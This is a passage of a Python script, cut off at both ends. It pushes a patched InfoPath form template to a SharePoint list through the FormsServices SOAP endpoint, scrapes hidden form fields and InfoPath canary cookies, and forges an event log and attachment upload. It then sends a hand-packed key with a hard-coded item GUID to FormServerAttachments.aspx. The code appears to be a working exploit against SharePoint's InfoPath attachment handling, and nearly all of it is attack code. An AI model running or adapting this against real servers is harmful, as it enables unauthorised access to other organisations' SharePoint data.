Qgc29saWQ7IFBBRERJTkctTEVGVDogMjJweDsgUEFERElORy1CT1RUT006IDE4cHg7IEJPUkRFUi1MRUZUOiAjZDhkOGQ4IDFwdCBzb2xpZDsgUEFERElORy1UT1A6IDhweDsgQkFDS0dST1VORC1DT0xPUjogI2ZmZmZmZn1URC54ZFZlcnRpY2FsRmlsbCB7Qk9SREVSLVRPUDogI2Q4ZDhkOCAxcHQgc29saWQ7IEJPUkRFUi1MRUZUOiAjZDhkOGQ4IDFwdCBzb2xpZDsgQk9SREVSLUJPVFRPTTogI2Q4ZDhkOCAxcHQgc29saWQ7IEJBQ0tHUk9VTkQtQ09MT1I6ICM2ODkwYmV9VEQueGRUYWJsZUNvbnRlbnRDZWxsV2l0aFZlcnRpY2FsT2Zmc2V0IHtCT1JERVItUklHSFQ6ICNkOGQ4ZDggMXB0IHNvbGlkOyBQQURESU5HLVJJR0hUOiAxMHB4OyBQQURESU5HLUxFRlQ6IDg1cHg7IFBBRERJTkctQk9UVE9NOiAwcHg7IEJPUkRFUi1MRUZUOiAjZDhkOGQ4IDFwdCBzb2xpZDsgUEFERElORy1UT1A6IDEycHg7IEJPUkRFUi1CT1RUT006ICNkOGQ4ZDggMXB0IHNvbGlkOyBCQUNLR1JPVU5ELUNPTE9SOiAjZmZmZmZmfVRSLnhkVGFibGVDb250ZW50Um93IHtNSU4tSEVJR0hUOiAxNDBweH1URC54ZFRhYmxlQ29udGVudENlbGwge0JPUkRFUi1SSUdIVDogI2Q4ZDhkOCAxcHQgc29saWQ7IFBBRERJTkctUklHSFQ6IDBweDsgUEFERElORy1MRUZUOiAwcHg7IFBBRERJTkctQk9UVE9NOiAwcHg7IEJPUkRFUi1MRUZUOiAjZDhkOGQ4IDFwdCBzb2xpZDsgUEFERElORy1UT1A6IDBweDsgQk9SREVSLUJPVFRPTTogI2Q4ZDhkOCAxcHQgc29saWQ7IEJBQ0tHUk9VTkQtQ09MT1I6ICNmZmZmZmZ9VEQueGRUYWJsZUNvbnRlbnRDZWxsV2l0aFZlcnRpY2FsRmlsbCB7Qk9SREVSLVJJR0hUOiAjZDhkOGQ4IDFwdCBzb2xpZDsgUEFERElORy1SSUdIVDogMXB4OyBQQURESU5HLUxFRlQ6IDFweDsgUEFERElORy1CT1RUT006IDBweDsgQk9SREVSLUxFRlQ6ICNkOGQ4ZDggMXB0IHNvbGlkOyBQQURESU5HLVRPUDogMHB4OyBCT1JERVItQk9UVE9NOiAjZDhkOGQ4IDFwdCBzb2xpZDsgQkFDS0dST1VORC1DT0xPUjogI2ZmZmZmZn1URC54ZFRhYmxlU3R5bGVPbmVDb2wge1BBRERJTkctUklHSFQ6IDIycHg7IEJPUkRFUi1UT1A6ICNkOGQ4ZDggMXB0IHNvbGlkOyBQQURESU5HLUxFRlQ6IDIycHg7IFBBRERJTkctQk9UVE9NOiA0cHg7IFBBRERJTkctVE9QOiA0cHg7IEJPUkRFUi1CT1RUT006ICNkOGQ4ZDggMXB0IHNvbGlkfVRSLnhkQ29udGVudFJvd09uZUNvbCB7TUlOLUhFSUdIVDogNDVweDsgdmFsaWduOiBjZW50ZXJ9VFIueGRIZWFkaW5nUm93IHtNSU4tSEVJR0hUOiAzNnB4fVRELnhkSGVhZGluZ0NlbGwge1BBRERJTkctUklHSFQ6IDIycHg7IFBBRERJTkctTEVGVDogMjJweDsgUEFERElORy1CT1RUT006IDRweDsgUEFERElORy1UT1A6IDZweDsgQk9SREVSLUJPVFRPTTogIzY4OTBiZSAxLjVwdCBzb2xpZH1UUi54ZFN1YmhlYWRpbmdSb3cge01JTi1IRUlHSFQ6IDI3cHh9VEQueGRTdWJoZWFkaW5nQ2VsbCB7UEFERElORy1SSUdIVDogMjJweDsgUEFERElORy1MRUZUOiAyMnB4OyBQQURESU5HLUJPVFRPTTogNHB4OyBQQURESU5HLVRPUDogNHB4OyBCT1JERVItQk9UVE9NOiAjYTVhNWE1IDFwdCBzb2xpZH1UUi54ZEhlYWRpbmdSb3dFbXBoYXNpcyB7TUlOLUhFSUdIVDogMzZweH1URC54ZEhlYWRpbmdDZWxsRW1waGFzaXMge1BBRERJTkctUklHSFQ6IDIycHg7IFBBRERJTkctTEVGVDogMjJweDsgUEFERElORy1CT1RUT006IDRweDsgUEFERElORy1UT1A6IDZweDsgQk9SREVSLUJPVFRPTTogIzY4OTBiZSAxLjVwdCBzb2xpZH1UUi54ZFN1YmhlYWRpbmdSb3dFbXBoYXNpcyB7TUlOLUhFSUdIVDogMjdweH1URC54ZFN1YmhlYWRpbmdDZWxsRW1waGFzaXMge1BBRERJTkctUklHSFQ6IDIycHg7IFBBRERJTkctTEVGVDogMjJweDsgUEFERElORy1CT1RUT006IDRweDsgUEFERElORy1UT1A6IDRweDsgQk9SREVSLUJPVFRPTTogI2E1YTVhNSAxcHQgc29saWR9VFIueGRUYWJsZUxhYmVsQ29udHJvbFN0YWNrZWRSb3cge01JTi1IRUlHSFQ6IDQ1cHh9VEQueGRUYWJsZUxhYmVsQ29udHJvbFN0YWNrZWRDZWxsTGFiZWwge1BBRERJTkctUklHSFQ6IDVweDsgQk9SREVSLVRPUDogI2Q4ZDhkOCAxcHQgc29saWQ7IFBBRERJTkctTEVGVDogMjJweDsgUEFERElORy1CT1RUT006IDRweDsgUEFERElORy1UT1A6IDRweDsgQk9SREVSLUJPVFRPTTogI2Q4ZDhkOCAxcHQgc29saWR9VEQueGRUYWJsZUxhYmVsQ29udHJvbFN0YWNrZWRDZWxsQ29tcG9uZW50IHtQQURESU5HLVJJR0hUOiAyMnB4OyBCT1JERVItVE9QOiAjZDhkOGQ4IDFwdCBzb2xpZDsgUEFERElORy1MRUZUOiA1cHg7IFBBRERJTkctQk9UVE9NOiA0cHg7IFBBRERJTkctVE9QOiA0cHg7IEJPUkRFUi1CT1RUT006ICNkOGQ4ZDggMXB0IHNvbGlkfVRSLnhkVGFibGVSb3cge01JTi1IRUlHSFQ6IDMwcHh9VEQueGRUYWJsZUNlbGxMYWJlbCB7UEFERElORy1SSUdIVDogNXB4OyBQQURESU5HLUxFRlQ6IDIycHg7IFBBRERJTkctQk9UVE9NOiA0cHg7IFBBRERJTkctVE9QOiA0cHh9VEQueGRUYWJsZUNlbGxDb21wb25lbnQge1BBRERJTkctUklHSFQ6IDIycHg7IFBBRERJTkctTEVGVDogNXB4OyBQQURESU5HLUJPVFRPTTogNHB4OyBQQURESU5HLVRPUDogNHB4fVRELnhkVGFibGVNaWRkbGVDZWxsIHtQQURESU5HLVJJR0hUOiA1cHg7IFBBRERJTkctTEVGVDogNXB4OyBQQURESU5HLUJPVFRPTTogNHB4OyBQQURESU5HLVRPUDogNHB4fVRSLnhkVGFibGVFbXBoYXNpc1JvdyB7TUlOLUhFSUdIVDogMzBweH1URC54ZFRhYmxlRW1waGFzaXNDZWxsTGFiZWwge1BBRERJTkctUklHSFQ6IDVweDsgQk9SREVSLVRPUDogI2Q4ZDhkOCAxcHQgc29saWQ7IFBBRERJTkctTEVGVDogMjJweDsgUEFERElORy1CT1RUT006IDRweDsgUEFERElORy1UT1A6IDRweDsgQk9SREVSLUJPVFRPTTogI2Q4ZDhkOCAxcHQgc29saWQ7IEJBQ0tHUk9VTkQtQ09MT1I6ICNmNWY2Zjd9VEQueGRUYWJsZUVtcGhhc2lzQ2VsbENvbXBvbmVudCB7UEFERElORy1SSUdIVDogMjJweDsgQk9SREVSLVRPUDogI2Q4ZDhkOCAxcHQgc29saWQ7IFBBRERJTkctTEVGVDogNXB4OyBQQURESU5HLUJPVFRPTTogNHB4OyBQQURESU5HLVRPUDogNHB4OyBCT1JERVItQk9UVE9NOiAjZDhkOGQ4IDFwdCBzb2xpZDsgQkFDS0dST1VORC1DT0xPUjogI2Y1ZjZmN31URC54ZFRhYmxlTWlkZGxlQ2VsbEVtcGhhc2lzIHtQQURESU5HLVJJR0hUOiA1cHg7IEJPUkRFUi1UT1A6ICNkOGQ4ZDggMXB0IHNvbGlkOyBQQURESU5HLUxFRlQ6IDVweDsgUEFERElORy1CT1RUT006IDRweDsgUEFERElORy1UT1A6IDRweDsgQk9SREVSLUJPVFRPTTogI2Q4ZDhkOCAxcHQgc29saWQ7IEJBQ0tHUk9VTkQtQ09MT1I6ICNmNWY2Zjd9VFIueGRUYWJsZU9mZnNldFJvdyB7TUlOLUhFSUdIVDogMzBweH1URC54ZFRhYmxlT2Zmc2V0Q2VsbExhYmVsIHtQQURESU5HLVJJR0hUOiA1cHg7IEJPUkRFUi1UT1A6ICNkOGQ4ZDggMXB0IHNvbGlkOyBQQURESU5HLUxFRlQ6IDIycHg7IFBBRERJTkctQk9UVE9NOiA0cHg7IFBBRERJTkctVE9QOiA0cHg7IEJPUkRFUi1CT1RUT006ICNkOGQ4ZDggMXB0IHNvbGlkfVRELnhkVGFibGVPZmZzZXRDZWxsQ29tcG9uZW50IHtQQURESU5HLVJJR0hUOiAyMnB4OyBCT1JERVItVE9QOiAjZDhkOGQ4IDFwdCBzb2xpZDsgUEFERElORy1MRUZUOiA1cHg7IFBBRERJTkctQk9UVE9NOiA0cHg7IFBBRERJTkctVE9QOiA0cHg7IEJPUkRFUi1CT1RUT006ICNkOGQ4ZDggMXB0IHNvbGlkOyBCQUNLR1JPVU5ELUNPTE9SOiAjZjVmNmY3fVAge01BUkdJTi1UT1A6IDBweDsgRk9OVC1TSVpFOiAxMHB0OyBDT0xPUjogIzNmM2YzZn1IMSB7TUFSR0lOLVRPUDogMHB4OyBGT05ULVdFSUdIVDogbm9ybWFsOyBGT05ULVNJWkU6IDIycHQ7IE1BUkdJTi1CT1RUT006IDBweDsgQ09MT1I6ICMzZjNmM2Z9SDIge01BUkdJTi1UT1A6IDBweDsgRk9OVC1XRUlHSFQ6IG5vcm1hbDsgRk9OVC1TSVpFOiAxNXB0OyBNQVJHSU4tQk9UVE9NOiAwcHg7IENPTE9SOiAjMjYyNjI2fUgzIHtNQVJHSU4tVE9QOiAwcHg7IEZPTlQtV0VJR0hUOiBib2xkOyBGT05ULVNJWkU6IDEycHQ7IE1BUkdJTi1CT1RUT006IDBweDsgQ09MT1I6ICMzZjNmM2Z9SDQge01BUkdJTi1UT1A6IDBweDsgRk9OVC1XRUlHSFQ6IG5vcm1hbDsgRk9OVC1TSVpFOiAxMHB0OyBNQVJHSU4tQk9UVE9NOiAwcHg7IENPTE9SOiAjM2YzZjNmfUg1IHtNQVJHSU4tVE9QOiAwcHg7IEZPTlQtV0VJR0hUOiBib2xkOyBGT05ULVNJWkU6IDEwcHQ7IE1BUkdJTi1CT1RUT006IDBweDsgQ09MT1I6ICMzZjNmM2Z9SDYge01BUkdJTi1UT1A6IDBweDsgRk9OVC1XRUlHSFQ6IG5vcm1hbDsgRk9OVC1TSVpFOiAxMHB0OyBNQVJHSU4tQk9UVE9NOiAwcHg7IENPTE9SOiAjM2YzZjNmfUJPRFkge0NPTE9SOiBibGFja308L3N0eWxlPg0KCQkJCTxzdHlsZSBsYW5ndWFnZVN0eWxlPSJsYW5ndWFnZVN0eWxlIj5ib2R5LCBzZWxlY3R7Zm9udC1mYW1pbHk6Q2FsaWJyaTtmb250LXNpemU6MTBwdH0gdGFibGV7Zm9udC1mYW1pbHk6Q2FsaWJyaTtmb250LXNpemU6MTBwdDtmb250LXdlaWdodDpub3JtYWw7Zm9udC1zdHlsZTpub3JtYWw7Y29sb3I6YmxhY2s7IHRleHQtdHJhbnNmb3JtOiBub25lfSAub3B0aW9uYWxQbGFjZWhvbGRlcntmb250LWZhbWlseTpDYWxpYnJpO2ZvbnQtc2l6ZTo5cHQ7Y29sb3I6IzMzMzMzMztmb250LXdlaWdodDpub3JtYWw7Zm9udC1zdHlsZTpub3JtYWw7dGV4dC1kZWNvcmF0aW9uOm5vbmU7cGFkZGluZy1sZWZ0OjIwcHg7QkVIQVZJT1I6dXJsKCNkZWZhdWx0I3hPcHRpb25hbCl9IC5sYW5nRm9udHt3aWR0aDoxNTBweDtmb250LWZhbWlseTpDYWxpYnJpOyBmb250LXNpemU6MTBwdDt9IC5kZWZhdWx0SW5Eb2NVSXtmb250LWZhbWlseTpDYWxpYnJpO2ZvbnQtc2l6ZTo5cHQ7fSAub3B0aW9uYWxQbGFjZWhvbGRlcntwYWRkaW5nLXJpZ2h0OjIwcHh9PC9zdHlsZT4NCgkJCTwvaGVhZD4NCgkJCTxib2R5IHN0eWxlPSJESVJFQ1RJT046IGx0ciI+DQoJCQkJPGRpdiBhbGlnbj0iY2VudGVyIj4NCgkJCQkJPHRhYmxlIGNsYXNzPSJ4ZEZvcm1MYXlvdXQiIHN0eWxlPSJCT1JERVItVE9QLVNUWUxFOiBub25lOyBXT1JELVdSQVA6IGJyZWFrLXdvcmQ7IEJPUkRFUi1MRUZULVNUWUxFOiBub25lOyBXSURUSDogNjUycHg7IEJPUkRFUi1DT0xMQVBTRTogY29sbGFwc2U7IFRBQkxFLUxBWU9VVDogZml4ZWQ7IEJPUkRFUi1CT1RUT00tU1RZTEU6IG5vbmU7IEJPUkRFUi1SSUdIVC1TVFlMRTogbm9uZSI+DQoJCQkJCQk8Y29sZ3JvdXA+DQoJCQkJCQkJPGNvbCBzdHlsZT0iV0lEVEg6IDY1MnB4Ij48L2NvbD4NCgkJCQkJCTwvY29sZ3JvdXA+DQoJCQkJCQk8dGJvZHk+DQoJCQkJCQkJPHRyIGNsYXNzPSJ4ZFRhYmxlQ29udGVudFJvdyIgc3R5bGU9Ik1JTi1IRUlHSFQ6IDRweCI+DQoJCQkJCQkJCTx0ZCB2QWxpZ249InRvcCIgc3R5bGU9IkJPUkRFUi1UT1A6ICNkOGQ4ZDggMXB0IHNvbGlkIiBjbGFzcz0ieGRUYWJsZUNvbnRlbnRDZWxsIj4NCgkJCQkJCQkJCTxkaXY+wqA8L2Rpdj4NCgkJCQkJCQkJCTxkaXY+DQoJCQkJCQkJCQkJPHRhYmxlIGNsYXNzPSJ4ZEZvcm1MYXlvdXQgeGRUYWJsZVN0eWxlVHdvQ29sIiBzdHlsZT0iQk9SREVSLVRPUC1TVFlMRTogbm9uZTsgV09SRC1XUkFQOiBicmVhay13b3JkOyBCT1JERVItTEVGVC1TVFlMRTogbm9uZTsgV0lEVEg6IDY0OXB4OyBCT1JERVItQ09MTEFQU0U6IGNvbGxhcHNlOyBUQUJMRS1MQVlPVVQ6IGZpeGVkOyBCT1JERVItQk9UVE9NLVNUWUxFOiBub25lOyBCT1JERVItUklHSFQtU1RZTEU6IG5vbmUiPg0KCQkJCQkJCQkJCQk8Y29sZ3JvdXA+DQoJCQkJCQkJCQkJCQk8Y29sIHN0eWxlPSJXSURUSDogMTY5cHgiPjwvY29sPg0KCQkJCQkJCQkJCQkJPGNvbCBzdHlsZT0iV0lEVEg6IDQ4MHB4Ij48L2NvbD4NCgkJCQkJCQkJCQkJPC9jb2xncm91cD4NCgkJCQkJCQkJCQkJPHRib2R5IHZBbGlnbj0idG9wIj4NCgkJCQkJCQkJCQkJCTx0ciBjbGFzcz0ieGRUYWJsZU9mZnNldFJvdyI+DQoJCQkJCQkJCQkJCQkJPHRkIHN0eWxlPSJWRVJUSUNBTC1BTElHTjogdG9wOyBQQURESU5HLUJPVFRPTTogNHB4OyBQQURESU5HLVRPUDogNHB4OyBQQURESU5HLUxFRlQ6IDIycHg7IFBBRERJTkctUklHSFQ6IDVweCIgY2xhc3M9InhkVGFibGVPZmZzZXRDZWxsTGFiZWwiPg0KCQkJCQkJCQkJCQkJCQk8aDQ+DQoJCQkJCQkJCQkJCQkJCQk8c3BhbiBjbGFzcz0ieGRsYWJlbCI+VGl0bGU8L3NwYW4+DQoJCQkJCQkJCQkJCQkJCTwvaDQ+DQoJCQkJCQkJCQkJCQkJPC90ZD4NCgkJCQkJCQkJCQkJCQk8dGQgc3R5bGU9IlZFUlRJQ0FMLUFMSUdOOiB0b3A7IFBBRERJTkctQk9UVE9NOiA0cHg7IFBBRERJTkctVE9QOiA0cHg7IFBBRERJTkctTEVGVDogNXB4OyBQQURESU5HLVJJR0hUOiAyMnB4IiBjbGFzcz0ieGRUYWJsZU9mZnNldENlbGxDb21wb25lbnQiPjxzcGFuIHRpdGxlPSIiIGNsYXNzPSJ4ZFRleHRCb3giIGhpZGVGb2N1cz0iMSIgdGFiSW5kZXg9IjAiIHhkOmRpc2FibGVFZGl0aW5nPSJubyIgeGQ6YmluZGluZz0iZGZzOmRhdGFGaWVsZHMvbXk6U2hhcmVQb2ludExpc3RJdGVtX1JXL215OlRpdGxlIiB4ZDpDdHJsSWQ9IkNUUkwxMSIgeGQ6eGN0bmFtZT0iUGxhaW5UZXh0IiBzdHlsZT0iV0lEVEg6IDEwMCUiPg0KCQkJCQkJCQkJCQkJCQkJPHhzbDp2YWx1ZS1vZiBzZWxlY3Q9ImRmczpkYXRhRmllbGRzL215OlNoYXJlUG9pbnRMaXN0SXRlbV9SVy9teTpUaXRsZSIvPg0KCQkJCQkJCQkJCQkJCQk8L3NwYW4+DQoJCQkJCQkJCQkJCQkJPC90ZD4NCgkJCQkJCQkJCQkJCTwvdHI+DQoJCQkJCQkJCQkJCQk8dHIgY2xhc3M9InhkVGFibGVPZmZzZXRSb3ciPg0KCQkJCQkJCQkJCQkJCTx0ZCBzdHlsZT0iVkVSVElDQUwtQUxJR046IHRvcDsgUEFERElORy1CT1RUT006IDRweDsgUEFERElORy1UT1A6IDRweDsgUEFERElORy1MRUZUOiAyMnB4OyBQQURESU5HLVJJR0hUOiA1cHgiIGNsYXNzPSJ4ZFRhYmxlT2Zmc2V0Q2VsbExhYmVsIj4NCgkJCQkJCQkJCQkJCQkJPGg0Pg0KCQkJCQkJCQkJCQkJCQkJPHNwYW4gY2xhc3M9InhkbGFiZWwiPkF0dGFjaG1lbnRzPC9zcGFuPg0KCQkJCQkJCQkJCQkJCQk8L2g0Pg0KCQkJCQkJCQkJCQkJCTwvdGQ+DQoJCQkJCQkJCQkJCQkJPHRkIHN0eWxlPSJWRVJUSUNBTC1BTElHTjogdG9wOyBQQURESU5HLUJPVFRPTTogNHB4OyBQQURESU5HLVRPUDogNHB4OyBQQURESU5HLUxFRlQ6IDVweDsgUEFERElORy1SSUdIVDogMjJweCIgY2xhc3M9InhkVGFibGVPZmZzZXRDZWxsQ29tcG9uZW50Ij4NCgkJCQkJCQkJCQkJCQkJPHNwYW4gdGl0bGU9IiIgY2xhc3M9InhkU2hhcmVQb2ludEZpbGVBdHRhY2htZW50IiBzdHlsZT0iSEVJR0hUOiAzMXB4OyBXSURUSDogMzMuMTMlIiB4ZDpkaXNhYmxlRWRpdGluZz0ieWVzIiB4ZDpiaW5kaW5nPSJkZnM6ZGF0YUZpZWxkcy9teTpTaGFyZVBvaW50TGlzdEl0ZW1fUlcvbXk6QXR0YWNobWVudHMiIHhkOkN0cmxJZD0iQ1RSTDE2IiB4ZDp4Y3RuYW1lPSJTaGFyZVBvaW50RmlsZUF0dGFjaG1lbnQiPg0KCQkJCQkJCQkJCQkJCQkJPFNQQU4gdGFiaW5kZXg9IjAiLz4NCgkJCQkJCQkJCQkJCQkJCTxkaXY+DQoJCQkJCQkJCQkJCQkJCQkJPHhzbDpmb3ItZWFjaCBzZWxlY3Q9ImRmczpkYXRhRmllbGRzL215OlNoYXJlUG9pbnRMaXN0SXRlbV9SVy9teTpBdHRhY2htZW50cy9hdHRhY2htZW50VVJMIj4NCgkJCQkJCQkJCQkJCQkJCQkJPGRpdiB0aXRsZT0iIiBjbGFzcz0ieGRBdHRhY2hJdGVtIiB4ZDpkaXNhYmxlRWRpdGluZz0ieWVzIiB4ZDp4Y3RuYW1lPSJTaGFyZVBvaW50QXR0YWNoSXRlbSI+DQoJCQkJCQkJCQkJCQkJCQkJCQk8U1BBTiBTVFlMRT0id2lkdGg6MzJweCIgeGQ6YmluZGluZz0iLiIgeGQ6ZGlzYWJsZUVkaXRpbmc9InllcyIgdGFiaW5kZXg9IjAiLz4NCgkJCQkJCQkJCQkJCQkJCQkJCTxhPg0KCQkJCQkJCQkJCQkJCQkJCQkJCTx4c2w6dmFyaWFibGUgbmFtZT0iSXNMb2NhbCIgc2VsZWN0PSJ4ZFhEb2N1bWVudDpHZXROYW1lZE5vZGVQcm9wZXJ0eSguLCAnSXNMb2NhbCcsICcnKSIvPg0KCQkJCQkJCQkJCQkJCQkJCQkJCTx4c2w6aWYgdGVzdD0iJElzTG9jYWwhPSd0cnVlJyI+DQoJCQkJCQkJCQkJCQkJCQkJCQkJCTx4c2w6YXR0cmlidXRlIG5hbWU9ImhyZWYiPg0KCQkJCQkJCQkJCQkJCQkJCQkJCQkJPHhzbDp2YWx1ZS1vZiBzZWxlY3Q9Ii4iLz4NCgkJCQkJCQkJCQkJCQkJCQkJCQkJPC94c2w6YXR0cmlidXRlPg0KCQkJCQkJCQkJCQkJCQkJCQkJCTwveHNsOmlmPg0KCQkJCQkJCQkJCQkJCQkJCQkJCTx4c2w6dmFsdWUtb2Ygc2VsZWN0PSJ4ZFhEb2N1bWVudDpHZXROYW1lZE5vZGVQcm9wZXJ0eSguLCAnRmlsZUF0dGFjaFVSTCcsICcnKSIvPg0KCQkJCQkJCQkJCQkJCQkJCQkJPC9hPg0KCQkJCQkJCQkJCQkJCQkJCQk8L2Rpdj4NCgkJCQkJCQkJCQkJCQkJCQk8L3hzbDpmb3ItZWFjaD4NCgkJCQkJCQkJCQkJCQkJCTwvZGl2Pg0KCQkJCQkJCQkJCQkJCQk8L3NwYW4+DQoJCQkJCQkJCQkJCQkJPC90ZD4NCgkJCQkJCQkJCQkJCTwvdHI+DQoJCQkJCQkJCQkJCTwvdGJvZHk+DQoJCQkJCQkJCQkJPC90YWJsZT4NCgkJCQkJCQkJCTwvZGl2Pg0KCQkJCQkJCQkJPGRpdj7CoDwvZGl2Pg0KCQkJCQkJCQk8L3RkPg0KCQkJCQkJCTwvdHI+DQoJCQkJCQk8L3Rib2R5Pg0KCQkJCQk8L3RhYmxlPg0KCQkJCTwvZGl2Pg0KCQkJPC9ib2R5Pg0KCQk8L2h0bWw+DQoJPC94c2w6dGVtcGxhdGU+DQo8L3hzbDpzdHlsZXNoZWV0Pg0K' xsn = cabarchive.CabArchive(base64.b64decode(xsn)) manifest = xsn['manifest.xsf'].buf.decode('latin-1') manifest = manifest.replace('SITE_URL', self.site_url + '/Lists/' + list_title + '/') manifest = manifest.replace('LIST_ID', list_id) manifest = manifest.replace('CONTENT_TYPE_ID', content_type_id) xsn['manifest.xsf'] = cabarchive.CabFile(manifest.encode('latin-1')) xsn = base64.b64encode(xsn.save()).decode('latin-1') headers = { 'SOAPAction': '"http://schemas.microsoft.com/office/infopath/2007/formsServices/SetFormsForListItem"', 'Content-Type': 'text/xml; charset=utf-8' } data = textwrap.dedent('''\ <?xml version="1.0" encoding="UTF-8" standalone="no"?> <SOAP-ENV:Envelope xmlns:SOAPSDK1="http://www.w3.org/2001/XMLSchema" xmlns:SOAPSDK2="http://www.w3.org/2001/XMLSchema-instance" xmlns:SOAPSDK3="http://schemas.xmlsoap.org/soap/encoding/" xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"> <SOAP-ENV:Body> <SetFormsForListItem xmlns='http://schemas.microsoft.com/office/infopath/2007/formsServices'> <lcid>1033</lcid> <base64FormTemplate>{}</base64FormTemplate> <applicationId>InfoPath 100</applicationId> <listGuid>{}</listGuid> <contentTypeId>{}</contentTypeId> </SetFormsForListItem> </SOAP-ENV:Body> </SOAP-ENV:Envelope> ''' ).format(xsn, list_id, content_type_id) r = self.s.post(self.site_url + '/_vti_bin/FormsServices.asmx', headers=headers, data=data) return True def upload_file(self, page_title, content): def urlencode(s): return s.replace('/', '%2F').replace('#', '%23').replace(' ', '%20').replace(':', '%3A') params = { 'Source': self.site_url + '/Lists/' + page_title + '/AllItems.aspx', 'RootFolder': '', 'AjaxDelta': 1 } r = self.s.get(self.site_url + '/Lists/' + page_title + '/NewForm.aspx', params=params) serialized_key = re.search('[0-9a-f]{32}_[0-9a-f]{32}', r.content.decode('latin-1')).group(0) canary_key = '' canary_value = '' for cookie in self.s.cookies: if cookie.name.find('_InfoPath_CanaryValue') != -1: canary_key = cookie.name.replace('_InfoPath_CanaryValue', '') canary_value = cookie.value html = BeautifulSoup(r.content, 'html.parser') ctl = '' inputs = html.find_all('input', {'type': 'hidden'}) for input in inputs: if input['name'].find('ctl00_ctl33_g_') != -1 and input['name'].find('__PostbackData') != -1: ctl = input['name'].replace('ctl00_ctl33_g_', '').replace('__PostbackData', '') entries = r.content.decode('latin-1') entries = entries[entries.find('var g_objCurrentFormData_ctl00_ctl33_g_' + ctl + '_FormControl0 = '):] entries = entries[entries.find('_FormControl0 = ')+16:entries.find('];')+1] entries = json.loads(entries) eventlog = '1 8;0;' + entries[3] + ';' + entries[4] + ';0;;' + urlencode(entries[8][2]) + ';' + urlencode(entries[8][4]).replace('%20', '%2520') + ';;' + urlencode(entries[15]) + ';' + urlencode(entries[8][5]).replace('%20', '%2520') + ';' + '1;0;0;1;0;2;' timestamp = canary_value[canary_value.find('|')+1:] eventlog += timestamp + ';;' + entries[8][8] + ';2;' + str(entries[5]) + ';' + str(entries[5]) + ';0;' + str(entries[-5]) + ';' + canary_value + ' 31;V1_I1_SPFAC2;; ' headers = { 'Origin': self.url, 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Referer': r.url } data = { '_wpcmWpid': html.find('input', {'name': '_wpcmWpid'})['value'], 'wpcmVal': html.find('input', {'name': 'wpcmVal'})['value'], 'MSOWebPartPage_PostbackSource': html.find('input', {'name': 'MSOWebPartPage_PostbackSource'})['value'], 'MSOTlPn_SelectedWpId': html.find('input', {'name': 'MSOTlPn_SelectedWpId'})['value'], 'MSOTlPn_View': html.find('input', {'name': 'MSOTlPn_View'})['value'], 'MSOTlPn_ShowSettings': html.find('input', {'name': 'MSOTlPn_ShowSettings'})['value'], 'MSOGallery_SelectedLibrary': html.find('input', {'name': 'MSOGallery_SelectedLibrary'})['value'], 'MSOGallery_FilterString': html.find('input', {'name': 'MSOGallery_FilterString'})['value'], 'MSOTlPn_Button': html.find('input', {'name': 'MSOTlPn_Button'})['value'], '__EVENTTARGET': 'ctl00$ctl33$g_' + ctl + '$FormControl0', '__EVENTARGUMENT': '', '__REQUESTDIGEST': html.find('input', {'name': '__REQUESTDIGEST'})['value'], 'MSOSPWebPartManager_DisplayModeName': html.find('input', {'name': 'MSOSPWebPartManager_DisplayModeName'})['value'], 'MSOSPWebPartManager_ExitingDesignMode': html.find('input', {'name': 'MSOSPWebPartManager_ExitingDesignMode'})['value'], 'MSOWebPartPage_Shared': html.find('input', {'name': 'MSOWebPartPage_Shared'})['value'], 'MSOLayout_LayoutChanges': html.find('input', {'name': 'MSOLayout_LayoutChanges'})['value'], 'MSOLayout_InDesignMode': html.find('input', {'name': 'MSOLayout_InDesignMode'})['value'], '_wpSelected': html.find('input', {'name': '_wpSelected'})['value'], '_wzSelected': html.find('input', {'name': '_wzSelected'})['value'], 'MSOSPWebPartManager_OldDisplayModeName': html.find('input', {'name': 'MSOSPWebPartManager_OldDisplayModeName'})['value'], 'MSOSPWebPartManager_StartWebPartEditingName': html.find('input', {'name': 'MSOSPWebPartManager_StartWebPartEditingName'})['value'], 'MSOSPWebPartManager_EndWebPartEditing': html.find('input', {'name': 'MSOSPWebPartManager_EndWebPartEditing'})['value'], '_maintainWorkspaceScrollPosition': html.find('input', {'name': '_maintainWorkspaceScrollPosition'})['value'], '__VIEWSTATE': html.find('input', {'name': '__VIEWSTATE'})['value'], '__VIEWSTATEGENERATOR': html.find('input', {'name': '__VIEWSTATEGENERATOR'})['value'], '__SCROLLPOSITIONX': html.find('input', {'name': '__SCROLLPOSITIONX'})['value'], '__SCROLLPOSITIONY': html.find('input', {'name': '__SCROLLPOSITIONY'})['value'], 'ctl00_ctl33_g_' + ctl + '__PostbackData': html.find('input', {'name': 'ctl00_ctl33_g_' + ctl + '__PostbackData'})['value'], 'ctl00_ctl33_g_' + ctl + '_FormControl0__es': html.find('input', {'name': 'ctl00_ctl33_g_' + ctl + '_FormControl0__es'})['value'], 'ctl00_ctl33_g_' + ctl + '_FormControl0__dv': html.find('input', {'name': 'ctl00_ctl33_g_' + ctl + '_FormControl0__dv'})['value'], 'ctl00_ctl33_g_' + ctl + '_FormControl0__EventLog': eventlog, 'ctl00_ctl33_g_' + ctl + '_FormControl0_InfoPathContinueLoading': html.find('input', {'name': 'ctl00_ctl33_g_' + ctl + '_FormControl0_InfoPathContinueLoading'})['value'], '__LastSelection': '[ctl00_ctl33_g_' + ctl + '_FormControl0,0,0,0,0,0,0,1,Edit item,1,0]', '__PerformSentinelDetection': html.find('input', {'name': '__PerformSentinelDetection'})['value'], '__EVENTVALIDATION': html.find('input', {'name': '__EVENTVALIDATION'})['value'], 'ctl00$ctl52': 'Ribbon.Tabs.InfoPathListTab' } files = { 'FileAttachmentUpload': ('test.txt', content, 'text/plain') } url = r.url.replace('&AjaxDelta=1', '') self.s.cookies.set('databaseBtnText', '0') self.s.cookies.set('databaseBtnDesc', '0') self.s.cookies.set('WSS_FullScreenMode', 'false') self.s.cookies.set('splnu', '0') r = self.s.post(url, headers=headers, data=data, files=files) item_id = 'db2c0d12-0b12-456b-8137-bb9a42602686' content = struct.pack('<BBB', 4, 2, len(item_id)) + item_id.encode('latin-1') + struct.pack('<B', len(serialized_key)) + serialized_key.encode('latin-1') + struct.pack('<BB', 0, 0) params = { 'fid': 'x', 'sid': canary_key, 'key': base64.b64encode(content), 'dl': 'ip' } r = self.s.get(self.site_url + '/_layouts/15/FormServerAttachments.aspx', params=params) serialized_key = re.search('[0-9a-f]{32}_[0-9a-f]{32}', 